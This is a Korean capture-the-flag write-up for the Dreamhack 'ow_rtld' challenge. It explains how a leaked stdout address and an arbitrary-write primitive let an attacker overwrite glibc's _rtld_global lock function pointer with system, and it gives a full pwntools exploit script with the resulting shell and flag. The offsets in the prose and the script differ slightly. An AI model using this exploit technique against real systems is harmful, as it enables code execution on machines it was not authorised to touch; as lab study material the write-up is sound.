Description
Exploit Tech: _rtld_global에서 실습하는 문제입니다.
checksec
seo@ubuntu:~/dreamhack$ checksec ./ow_rtld
[!] Could not populate PLT: future feature annotations is not defined (unicorn.py, line 2)
[*] '/home/seo/dreamhack/ow_rtld'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
보호기법이 전부 다 걸려있다.
Decompiled-src
main
int __cdecl main(int argc, const char **argv, const char **envp)
{
int v4; // [rsp+4h] [rbp-1Ch] BYREF
_QWORD *v5; // [rsp+8h] [rbp-18h] BYREF
__int64 v6[2]; // [rsp+10h] [rbp-10h] BYREF
v6[1] = __readfsqword(0x28u);
init(argc, argv, envp);
printf("stdout: %p\n", _bss_start);
while ( 1 )
{
printf("> ");
__isoc99_scanf("%d", &v4);
if ( v4 != 1 )
break;
printf("addr: ");
__isoc99_scanf("%ld", &v5);
printf("data: ");
__isoc99_scanf("%ld", v6);
*v5 = v6[0];
}
return 0;
}
stdout 주소를 알려주고
초기에 1을 계속 입력하면, 항상 scanf를 통해 원하는 주소에 값을 쓸 수 있다.
Solution
stdout 주소를 알려주기 때문에, libc base 주소를 쉽게 구할 수 있다.
seo@ubuntu:~$ cat /proc/13328/maps ... 7f91aa731000-7f91aa918000 r-xp 00000000 08:01 1189215 /lib/x86_64-linux-gnu/libc-2.27.so ... 7f91aab22000-7f91aab49000 r-xp 00000000 08:01 1189211 /lib/x86_64-linux-gnu/ld-2.27.so ... seo@ubuntu:~$ cat /proc/13514/maps ... 7f9517a0f000-7f9517bf6000 r-xp 00000000 08:01 1189215 /lib/x86_64-linux-gnu/libc-2.27.so ... 7f9517e00000-7f9517e27000 r-xp 00000000 08:01 1189211 /lib/x86_64-linux-gnu/ld-2.27.so ...
ld base 주소 또한 쉽게 구할 수 있다.
hex(0x7f9517e00000 – 0x7f9517a0f000)
‘0x3f1000’
hex(0x7f91aab22000 – 0x7f91aa731000)
‘0x3f1000’
오프셋 차이는 0x3f1000로, libc_base 주소에서 0x3f1000을 더하면 ld_base 주소를 구할 수 있다.
(ubuntu 18.04.3 server 64bit, libc6:2.27-3ubuntu1 기준)
이제 프로세스가 종료 될 때 호출 되는 구조체를 사용하여 우리가 원하는 함수를 호출시키게 만들면 된다.
프로세스가 종료 될 때 호출 되는 구조체를 사용할 수 있다.
전에 봐왔던 rtld 문제처럼, 프로세스가 종료되는 과정은 다음과 같다.
__GI_exit -> __run_exit_handlers -> _dl_fini
_dl_fini 함수를 살펴보면,
https://github.com/bminor/glibc/blob/glibc-2.27/elf/dl-fini.c#L53
void
_dl_fini (void)
{
...
#ifdef SHARED
int do_audit = 0;
again:
#endif
for (Lmid_t ns = GL(dl_nns) - 1; ns >= 0; --ns)
{
/* Protect against concurrent loads and unloads. */
__rtld_lock_lock_recursive (GL(dl_load_lock));
...
for문 안을 보면 dl_load_lock 을 인자로 해서 __rtld_lock_lock_recursive 함수를 호출하는 것을 볼 수 있다.
seo@ubuntu:~/dreamhack$ sudo apt install libc6-dbg=2.27-3ubuntu1
이제 오프셋을 하나씩 구해보자.
gdb-peda$ p &_rtld_global._dl_rtld_lock_recursive $2 = (void (**)(void *)) 0x7ffff7ffdf60 <_rtld_global+3840> gdb-peda$ p &_rtld_global._dl_load_lock $3 = (__rtld_lock_recursive_t *) 0x7ffff7ffd968 <_rtld_global+2312>
각각 _dl_rtld_lock_recursive은 _rtld_global+3840,
_dl_load_lock은 _rtld_global+2312 지점에 있다는 것을 알았기 때문에,
이제 _dl_rtld_lock_recursive에는 호출하려는 주소인 system 주소를 덮어쓰고,
_dl_load_lock에는 인자인 “/bin/sh” 주소를 덮어써주면 쉘을 획득할 수 있다.
solve.py
from pwn import *
#p = process('./ow_rtld')
p = remote('host3.dreamhack.games', 20469)
e = ELF('./ow_rtld')
libc = ELF('./libc-2.27.so')
ld = ELF('./ld-2.27.so')
stdout = p.recvline()
stdout = stdout.split(b": ")[1]
stdout = stdout.split(b"\n")[0]
stdout = int(stdout, 16)
print(f"stdout: {hex(stdout)}")
libc_base = stdout - libc.symbols['_IO_2_1_stdout_']
print(f"libc_base: {hex(libc_base)}")
ld_base = libc_base + 0x3f1000
print(f"ld_base: {hex(ld_base)}")
dl_rtld_lock_recursive = ld_base + ld.symbols['_rtld_global'] + 3848
print(f"dl_rtld_lock_recursive: {hex(dl_rtld_lock_recursive)}")
dl_load_lock = ld_base + ld.symbols['_rtld_global'] + 2312
print(f"dl_load_lock: {hex(dl_load_lock)}")
p.sendlineafter(b"> ", b"1")
p.sendlineafter(b"addr: ", str(dl_load_lock))
p.sendlineafter(b"data: ", str(u64("sh\0\0\0\0\0\0")))
p.sendlineafter(b"> ", b"1")
p.sendlineafter(b"addr: ", str(dl_rtld_lock_recursive))
p.sendlineafter(b"data: ", str(libc_base + libc.symbols['system']))
p.sendlineafter(b"> ", b"0")
p.interactive()
Result
seo@ubuntu:~/dreamhack$ python3 solve.py
[+] Opening connection to host3.dreamhack.games on port 20469: Done
[!] Could not populate PLT: future feature annotations is not defined (unicorn.py, line 2)
[!] Could not populate PLT: future feature annotations is not defined (unicorn.py, line 2)
[!] Could not populate PLT: future feature annotations is not defined (unicorn.py, line 2)
stdout: 0x7f25ba74d760
libc_base: 0x7f25ba361000
ld_base: 0x7f25ba752000
dl_rtld_lock_recursive: 0x7f25ba97af68
dl_load_lock: 0x7f25ba97a968
[*] Switching to interactive mode
$ ls
flag
ow_rtld
$ cat flag
DH{a5bd416ee5f23da9f378c1b5d177b99366141f93beb3eabfa5b74abcf83f4293}
$
[*] Interrupted
[*] Closed connection to host3.dreamhack.games port 20469